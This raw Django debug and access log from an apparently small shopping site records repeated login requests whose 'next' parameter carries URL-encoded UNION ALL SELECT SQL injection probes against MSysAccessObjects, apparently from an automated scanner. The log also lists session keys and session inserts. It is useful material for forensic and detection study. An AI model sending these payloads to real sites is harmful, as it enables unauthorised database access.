datetime.datetime(2020, 1, 15, 15, 25, 22, 967111, tzinfo=)) [01/Jan/2020 15:25:22] "GET /login/?next=-1634%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27TEXNOUAZPvIbgvGhKxpEfjyABpqmxJJpRipkopRy%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20GDmD HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:23,130 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '47iuylv9bgozo4v7d6vxhfx3627hgmhf' LIMIT 1; args=('47iuylv9bgozo4v7d6vxhfx3627hgmhf',) DEBUG 2020-01-01 15:25:23,132 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('47iuylv9bgozo4v7d6vxhfx3627hgmhf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:23.131196+00:00'::timestamptz); args=('47iuylv9bgozo4v7d6vxhfx3627hgmhf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 23, 131196, tzinfo=)) [01/Jan/2020 15:25:23] "GET /login/?next=-7970%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27AvobNngUqrrEHcgSvGDcRLpExTCOpLPArsMjTeUn%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20uhyT HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:23,287 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ypy43wfezu9mofhclz75xin88wt7d7dt' LIMIT 1; args=('ypy43wfezu9mofhclz75xin88wt7d7dt',) DEBUG 2020-01-01 15:25:23,290 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ypy43wfezu9mofhclz75xin88wt7d7dt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:23.288464+00:00'::timestamptz); args=('ypy43wfezu9mofhclz75xin88wt7d7dt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 23, 288464, tzinfo=)) [01/Jan/2020 15:25:23] "GET /login/?next=-5137%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27ffcoMfZpBGDdWCDhEJKOKetmCLcwdMCymtPEtVyY%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20nJCL HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:23,472 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'kmaucnflew7nk7p6wu6ak6b94lqyahu4' LIMIT 1; args=('kmaucnflew7nk7p6wu6ak6b94lqyahu4',) DEBUG 2020-01-01 15:25:23,475 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('kmaucnflew7nk7p6wu6ak6b94lqyahu4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:23.473123+00:00'::timestamptz); args=('kmaucnflew7nk7p6wu6ak6b94lqyahu4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 23, 473123, tzinfo=)) [01/Jan/2020 15:25:23] "GET /login/?next=-5397%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27NsDyrYnnsQdilXvYDwIKWiUqMCLMkmXlTTaqBgsG%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20zBOW HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:23,638 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'zkv1osfyafvkx88t8zqpx5l9hd58lce4' LIMIT 1; args=('zkv1osfyafvkx88t8zqpx5l9hd58lce4',) DEBUG 2020-01-01 15:25:23,640 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('zkv1osfyafvkx88t8zqpx5l9hd58lce4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:23.639045+00:00'::timestamptz); args=('zkv1osfyafvkx88t8zqpx5l9hd58lce4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 23, 639045, tzinfo=)) [01/Jan/2020 15:25:23] "GET /login/?next=-8988%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27tcPgWSpHVyiIHhbgqUbRFtNSbinDFyNaHkWfvsiX%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20llNA HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:23,777 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'lx3xy7n2y0f9t8plcfjp85vcftgg7xka' LIMIT 1; args=('lx3xy7n2y0f9t8plcfjp85vcftgg7xka',) DEBUG 2020-01-01 15:25:23,778 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('lx3xy7n2y0f9t8plcfjp85vcftgg7xka', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:23.777753+00:00'::timestamptz); args=('lx3xy7n2y0f9t8plcfjp85vcftgg7xka', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 23, 777753, tzinfo=)) [01/Jan/2020 15:25:23] "GET /login/?next=-1512%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27BUmUncIcdbfhOCfQAbkXQCbwGtjOpJISOxjgjZqq%27%7C%7C%27qppzq%27%2CNULL%20FROM%20MSysAccessObjects--%20FVSr HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:23,946 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'yr2ddl5oo2rp56t40i8xh4h0qjno5bur' LIMIT 1; args=('yr2ddl5oo2rp56t40i8xh4h0qjno5bur',) DEBUG 2020-01-01 15:25:23,949 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('yr2ddl5oo2rp56t40i8xh4h0qjno5bur', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:23.947337+00:00'::timestamptz); args=('yr2ddl5oo2rp56t40i8xh4h0qjno5bur', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 23, 947337, tzinfo=)) [01/Jan/2020 15:25:23] "GET /login/?next=-6148%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27EryqZwCISTNkpfPhuiGAzmkfDERHyxSegBKFvYYE%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20hAzX HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:24,093 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'l1blg7emag29gy5qjaqw2cllb9u72nx7' LIMIT 1; args=('l1blg7emag29gy5qjaqw2cllb9u72nx7',) DEBUG 2020-01-01 15:25:24,095 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('l1blg7emag29gy5qjaqw2cllb9u72nx7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:24.093726+00:00'::timestamptz); args=('l1blg7emag29gy5qjaqw2cllb9u72nx7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 24, 93726, tzinfo=)) [01/Jan/2020 15:25:24] "GET /login/?next=-1278%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27OUOzTkUhTrWcrAxSAwxgvmSGvgcDmdTkicFxObUs%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20vwpL HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:24,261 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '8diqy5cs8o20ci2yfw1e2ru7ffxvac7l' LIMIT 1; args=('8diqy5cs8o20ci2yfw1e2ru7ffxvac7l',) DEBUG 2020-01-01 15:25:24,264 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('8diqy5cs8o20ci2yfw1e2ru7ffxvac7l', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:24.262298+00:00'::timestamptz); args=('8diqy5cs8o20ci2yfw1e2ru7ffxvac7l', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 24, 262298, tzinfo=)) [01/Jan/2020 15:25:24] "GET /login/?next=-6191%20UNION%20ALL%20SELECT%20%27qxvkq%27%7C%7C%27GyPLyJhzwIqrDIllaNdEkDGGXzkDfWrpAEUNPKzT%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20Jvsb HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:24,424 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'zoayjw8ys2b3h61e15f83sd3sjymrh5l' LIMIT 1; args=('zoayjw8ys2b3h61e15f83sd3sjymrh5l',) DEBUG 2020-01-01 15:25:24,426 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('zoayjw8ys2b3h61e15f83sd3sjymrh5l', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:24.425076+00:00'::timestamptz); args=('zoayjw8ys2b3h61e15f83sd3sjymrh5l', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 24, 425076, tzinfo=)) [01/Jan/2020 15:25:24] "GET /login/?next=-9190%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27FcMNwwRRqlWsQvmuEJGKuqmAvmyHOFYkffrsljfY%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20LPou HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:24,592 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 't2w42mjwxdxg9alyxnwhmrnzx4tlj5c6' LIMIT 1; args=('t2w42mjwxdxg9alyxnwhmrnzx4tlj5c6',) DEBUG 2020-01-01 15:25:24,594 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('t2w42mjwxdxg9alyxnwhmrnzx4tlj5c6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:24.592754+00:00'::timestamptz); args=('t2w42mjwxdxg9alyxnwhmrnzx4tlj5c6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 24, 592754, tzinfo=)) [01/Jan/2020 15:25:24] "GET /login/?next=-7912%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27qxvkq%27%7C%7C%27LdKvvnptlZyClwawiQreIyAEyCzWpTQcDFybxjYZ%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20XStz HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:24,738 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '7uhe7arslva0xwo87g79rgxhw6d2x75e' LIMIT 1; args=('7uhe7arslva0xwo87g79rgxhw6d2x75e',) DEBUG 2020-01-01 15:25:24,740 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('7uhe7arslva0xwo87g79rgxhw6d2x75e', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:24.739344+00:00'::timestamptz); args=('7uhe7arslva0xwo87g79rgxhw6d2x75e', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 24, 739344, tzinfo=)) [01/Jan/2020 15:25:24] "GET /login/?next=-8753%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27hUpyrTPBjnScVBXOumoBLNOVhNcGBLcCrMCnYvDH%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20uXTr HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:24,887 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'zp3l9d9an3331pdw7zlp0ymyp7f7mxc3' LIMIT 1; args=('zp3l9d9an3331pdw7zlp0ymyp7f7mxc3',) DEBUG 2020-01-01 15:25:24,889 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('zp3l9d9an3331pdw7zlp0ymyp7f7mxc3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:24.888143+00:00'::timestamptz); args=('zp3l9d9an3331pdw7zlp0ymyp7f7mxc3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 24, 888143, tzinfo=)) [01/Jan/2020 15:25:24] "GET /login/?next=-5741%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27SVkeXdbWnFbyEcgpZNXRDFFOegSkvJjtVJaqqjmd%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20XcrK HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:25,044 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'fj4mvg15mwelq2i0uqbs4ygcmc4d741b' LIMIT 1; args=('fj4mvg15mwelq2i0uqbs4ygcmc4d741b',) DEBUG 2020-01-01 15:25:25,046 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('fj4mvg15mwelq2i0uqbs4ygcmc4d741b', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:25.044655+00:00'::timestamptz); args=('fj4mvg15mwelq2i0uqbs4ygcmc4d741b', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 25, 44655, tzinfo=)) [01/Jan/2020 15:25:25] "GET /login/?next=-2486%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27eIHojBhyjbEkgmqGMpELNHxhEbHxrgQZzHqLiGnX%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20kgbo HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:25,208 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '16ubz1jr2v9ggf2zucamwa4vi61ypadt' LIMIT 1; args=('16ubz1jr2v9ggf2zucamwa4vi61ypadt',) DEBUG 2020-01-01 15:25:25,210 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('16ubz1jr2v9ggf2zucamwa4vi61ypadt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:25.208753+00:00'::timestamptz); args=('16ubz1jr2v9ggf2zucamwa4vi61ypadt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 25, 208753, tzinfo=)) [01/Jan/2020 15:25:25] "GET /login/?next=-9396%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27uGBUcFiKxZSoorbpdDtjWyqBtNXELsfJGRctuTdH%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20ZdWQ HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:25,370 utils 2749 140297233225472 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'b5c6htanzmdkqmh2t3k4pm0vselqyjiw' LIMIT 1; args=('b5c6htanzmdkqmh2t3k4pm0vselqyjiw',) DEBUG 2020-01-01 15:25:25,373 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('b5c6htanzmdkqmh2t3k4pm0vselqyjiw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:25.371337+00:00'::timestamptz); args=('b5c6htanzmdkqmh2t3k4pm0vselqyjiw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 25, 371337, tzinfo=)) [01/Jan/2020 15:25:25] "GET /login/?next=-4483%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27GFDHBfXJtG%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20lLvc HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:25,535 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ubwag1lfbci2p23g1wn4acklappsz4a5' LIMIT 1; args=('ubwag1lfbci2p23g1wn4acklappsz4a5',) DEBUG 2020-01-01 15:25:25,537 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ubwag1lfbci2p23g1wn4acklappsz4a5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:25.535695+00:00'::timestamptz); args=('ubwag1lfbci2p23g1wn4acklappsz4a5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 25, 535695, tzinfo=)) [01/Jan/2020 15:25:25] "GET /login/?next=-6729%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27ULHFboZLhR%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20CDAS HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:25,700 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'hpmp0e5u2x9ejt1c549y5mijhw51hg5o' LIMIT 1; args=('hpmp0e5u2x9ejt1c549y5mijhw51hg5o',) DEBUG 2020-01-01 15:25:25,703 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('hpmp0e5u2x9ejt1c549y5mijhw51hg5o', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:25.701145+00:00'::timestamptz); args=('hpmp0e5u2x9ejt1c549y5mijhw51hg5o', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 25, 701145, tzinfo=)) [01/Jan/2020 15:25:25] "GET /login/?next=-9702%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27lvfNJWlcNf%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20cIAx HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:25,877 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'fic3vwuasxwfz51d0hsjdki3qkbdyb48' LIMIT 1; args=('fic3vwuasxwfz51d0hsjdki3qkbdyb48',) DEBUG 2020-01-01 15:25:25,880 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('fic3vwuasxwfz51d0hsjdki3qkbdyb48', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:25.877978+00:00'::timestamptz); args=('fic3vwuasxwfz51d0hsjdki3qkbdyb48', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 25, 877978, tzinfo=)) [01/Jan/2020 15:25:25] "GET /login/?next=-1075%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27bveHJWunIQ%27%7C%7C%27qppzq%27%20FROM%20MSysAccessObjects--%20YGbI HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:26,106 utils 2749 140297233225472 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'vwo740w0te5qrlvkmt33c700wswzb9z1' LIMIT 1; args=('vwo740w0te5qrlvkmt33c700wswzb9z1',) DEBUG 2020-01-01 15:25:26,109 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('vwo740w0te5qrlvkmt33c700wswzb9z1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:26.107032+00:00'::timestamptz); args=('vwo740w0te5qrlvkmt33c700wswzb9z1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 26, 107032, tzinfo=)) [01/Jan/2020 15:25:26] "GET 